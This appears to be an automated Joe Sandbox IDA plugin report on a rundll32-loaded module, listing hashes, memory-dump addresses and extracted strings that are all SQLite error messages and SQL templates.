                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s: "%s" - should this be a string literal in single-quotes?$%s: %s$%s: %s.%s$%s: %s.%s.%s$H$N$ROWID$ambiguous column name$coalesce$double-quoted string literal: "%w"$excluded$main$misuse of aliased aggregate %s$misuse of aliased window function %s$new$no such column$old$row value misused$z
                                                                                                                                                                                                • API String ID: 0-3187542301
                                                                                                                                                                                                • Opcode ID: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                                • Instruction ID: 4246006d6fce571d2577d5d27ce5bcf1207e6cd075260c04030cf03f62b0cc2d
                                                                                                                                                                                                • Opcode Fuzzy Hash: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FC2C132B0A68387EB608B16D060A797BA9FB55B80F154135DEAD4B7E9DF3CE841C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                • API String ID: 0-767664412
                                                                                                                                                                                                • Opcode ID: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                                • Instruction ID: 8f8b08e3246fcf9e18e274534af2af95850d494d6380d85892ac528e9bf5666c
                                                                                                                                                                                                • Opcode Fuzzy Hash: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                                • Instruction Fuzzy Hash: D6B136D37315984BD7988A3EF822F9D2B84D3A5348F485239F645CFFC6E92AE5018742
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: , ?$,%s(?)$4$PRAGMA %Q.page_size$compress$content$error parsing prefix parameter: %s$languageid$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$notindexed$order$prefix$simple$tokenize$uncompress$unrecognized parameter: %s
                                                                                                                                                                                                • API String ID: 0-404594414
                                                                                                                                                                                                • Opcode ID: 64c68a9dc0dcbdab5007c6264897c792c80bd07b04c8c7ee774f8f784e2f3ec5
                                                                                                                                                                                                • Instruction ID: d5ea43542613cbc2305e3111f79bcc9299a341592ccaf9fde854541b70735e47
                                                                                                                                                                                                • Opcode Fuzzy Hash: 64c68a9dc0dcbdab5007c6264897c792c80bd07b04c8c7ee774f8f784e2f3ec5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 74D26A21B0AA4789EB158F25A8B0AB837A6FB44B94F144136DE7E477F8DF7CE4458700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %Q.'%q_%s'$, NULL$, T.%Q$, T.c%d$, T.l%d$T.%Q$content$contentless_delete=1 is incompatible with columnsize=0$contentless_delete=1 requires a contentless table$contentless_unindexed=1 requires a contentless table$docsize$parse error in "%s"$rank$reserved fts5 column name: %s$reserved fts5 table name: %s$rowid$unindexed$unrecognized column option: %s
                                                                                                                                                                                                • API String ID: 0-1703952466
                                                                                                                                                                                                • Opcode ID: e0722a959b0f68951ea6c00ec1e8fdeaf9ab7d2dbe7ce232cef2b613431a279b
                                                                                                                                                                                                • Instruction ID: dd5e6d0fffa1316787b9fae41bd89d69c160ce5078fbfbc6d9c97cb1207e7b14
                                                                                                                                                                                                • Opcode Fuzzy Hash: e0722a959b0f68951ea6c00ec1e8fdeaf9ab7d2dbe7ce232cef2b613431a279b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E528922B0AA4385FB648F619460AB837A0BF04B88F556135DE7E576EDDF7CE641C320
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: C$C$C$C$always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$tni$too many columns on %s$txet
                                                                                                                                                                                                • API String ID: 0-3729332310
                                                                                                                                                                                                • Opcode ID: 5441754b170770024d5127e7584db56a974fcfdf43076ebf41da5bdf4aae6a40
                                                                                                                                                                                                • Instruction ID: b7413d7713a1e2c4a364185fc715e41fcbd397b266eb3d66f1175e3b5c59897a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5441754b170770024d5127e7584db56a974fcfdf43076ebf41da5bdf4aae6a40
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB220DA2B0E6D741E7668B259870FB97B91EB45744F548036DABE472EECF2CE541C300
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: AUTOINCREMENT not allowed on WITHOUT ROWID tables$CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$PRIMARY KEY missing on table %s$SELECT*FROM"%w"."%w"$TABLE$UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$missing datatype for %s.%s$must have at least one non-generated column$sqlite_sequence$table$tbl_name='%q' AND type!='trigger'$unknown datatype for %s.%s: "%s"$view
                                                                                                                                                                                                • API String ID: 0-1715202245
                                                                                                                                                                                                • Opcode ID: 9a087570cc2f4fad15fc8ab07b2996f2f98e216db0034c6ac936a1e0ac789fc8
                                                                                                                                                                                                • Instruction ID: 8546c758e790734bed66f3c8599326fb5e9e13b7258a6abb3338a2a39e04a84c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a087570cc2f4fad15fc8ab07b2996f2f98e216db0034c6ac936a1e0ac789fc8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19627372B0A68386EB609F26D4A0BB977A0FB48B88F444135DA9D477EADF7CD541C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: .$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                • API String ID: 0-3693326857
                                                                                                                                                                                                • Opcode ID: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                                • Instruction ID: a62caac4ddf540e4463bbe3673c362443c9c08ec84c9f49908ce7c032f88b4de
                                                                                                                                                                                                • Opcode Fuzzy Hash: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 79615B93B215984BF74DC63EFC22BAD2BD5A390344F084235EE45DFBC6E929E6018742
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Child page depth differs$Extends off end of page$Fragmentation of %u bytes reported as %u on page %u$Multiple uses for byte %u of page %u$Offset %u out of range %u..%u$Rowid %lld out of order$Tree %u page %u cell %u: $Tree %u page %u right child: $Tree %u page %u: $btreeInitPage() returns error code %d$free space corruption$unable to get the page. error code=%d
                                                                                                                                                                                                • API String ID: 0-835090162
                                                                                                                                                                                                • Opcode ID: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                                • Instruction ID: c1c7c18964eb81a5220b5651d495f62c0f1ba7e4c92cdf82f59aff0983a1a41b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D32D336B19692C7D7648F25E060A7E7BA1F785B84F008135DBAA43BA8DF7DE505CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: PRIMARY KEY$UNIQUE$UPDATE "%w".sqlite_master SET sql = sqlite_drop_column(%d, sql, %d) WHERE (type=='table' AND tbl_name=%Q COLLATE nocase)$after drop column$cannot %s %s "%s"$cannot drop %s column: "%s"$cannot drop column "%s": no other columns exist$drop column from$no such column: "%T"$q$view$virtual table
                                                                                                                                                                                                • API String ID: 0-74819023
                                                                                                                                                                                                • Opcode ID: 9042b0255d86f7771479d4dcec3536c4bf197c45786653786b373156b6fcd31f
                                                                                                                                                                                                • Instruction ID: 6b0a3ead6cc169f221994136ab75735a04ce93774bf33e3feca5ec5ef49b0741
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9042b0255d86f7771479d4dcec3536c4bf197c45786653786b373156b6fcd31f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D22AF72B0A68386D7A0CF16D0A0ABA77A5FB84B84F519035DE9E477A9DF3CD541CB00
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: -$-$-$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                • API String ID: 0-3831715856
                                                                                                                                                                                                • Opcode ID: 38ceaeefa8122eda77a6a4c0540e4d72ea643edef9484be0f76a5f63aed2900a
                                                                                                                                                                                                • Instruction ID: e09fc7dcc4f114a469f5e8370004fa558f76d46f294eab955f0f9081af00622a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 38ceaeefa8122eda77a6a4c0540e4d72ea643edef9484be0f76a5f63aed2900a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 635148A273528447D758C63EB822F5E6BC5E3E0340F445236F691CBBC6EA2DE501CB02
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                • API String ID: 0-3976573709
                                                                                                                                                                                                • Opcode ID: 662fe615cfab7b1aa0e8cae44b99fcdbb085a495a7ab937f8e549f149255944c
                                                                                                                                                                                                • Instruction ID: 32c24c7230af7194ff22d597a38a83e5152cd63b46ff10e1a612445c9620a0bc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 662fe615cfab7b1aa0e8cae44b99fcdbb085a495a7ab937f8e549f149255944c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CB27132B0AA8386EB649F15E460AB977A9FF44B84F145035DAAD0B7E9DF3DE441C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$%s_segments$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$block$misuse
                                                                                                                                                                                                • API String ID: 0-2527169551
                                                                                                                                                                                                • Opcode ID: 2ff427c3379e0ccf89c1881abba420e9af601d77ba16a9958c8fd455f74f5c30
                                                                                                                                                                                                • Instruction ID: 5c984feb4fa17a12b32b6db5dd7ea28d98327de19d95732383508df5a64e0959
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ff427c3379e0ccf89c1881abba420e9af601d77ba16a9958c8fd455f74f5c30
                                                                                                                                                                                                • Instruction Fuzzy Hash: F5037A62B0EA4386FB548F25A460BB827E5EF44B88F244139CE6E577F9DE7CE4418340
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: cannot open %s column for writing$cannot open table with generated columns: %s$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                • API String ID: 0-3985037806
                                                                                                                                                                                                • Opcode ID: fa98a98fadb9ba41371025353503ccae29a0d021d01833e94f36f681e5e9fbae
                                                                                                                                                                                                • Instruction ID: a0edc8d6d0ded0d8de04e5baaddc4418f7f0c21d6ad3148d248d4645739063e8
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa98a98fadb9ba41371025353503ccae29a0d021d01833e94f36f681e5e9fbae
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36526E32B0EA8385EB948F25D4A4BB937A8FB44B84F454139DA6D477E9DF78E490C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %d values for %d columns$SCAN %S$UPSERT not implemented for virtual table "%s"$cannot INSERT into generated column "%s"$cannot UPSERT a view$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                                • API String ID: 0-458612905
                                                                                                                                                                                                • Opcode ID: 51300875465a9fbebbd44388bed4909b095c6794c60fa99f4c1cdf30ed5f2848
                                                                                                                                                                                                • Instruction ID: d67e12bcf74decb041e5f5c5967c53d7b22a271c01f2374d7875cebcd3e354ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 51300875465a9fbebbd44388bed4909b095c6794c60fa99f4c1cdf30ed5f2848
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF28172B0A6928AEB60CF25C464BBD3BA1FB84B98F554135DE6D477A9DF38E440C700
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
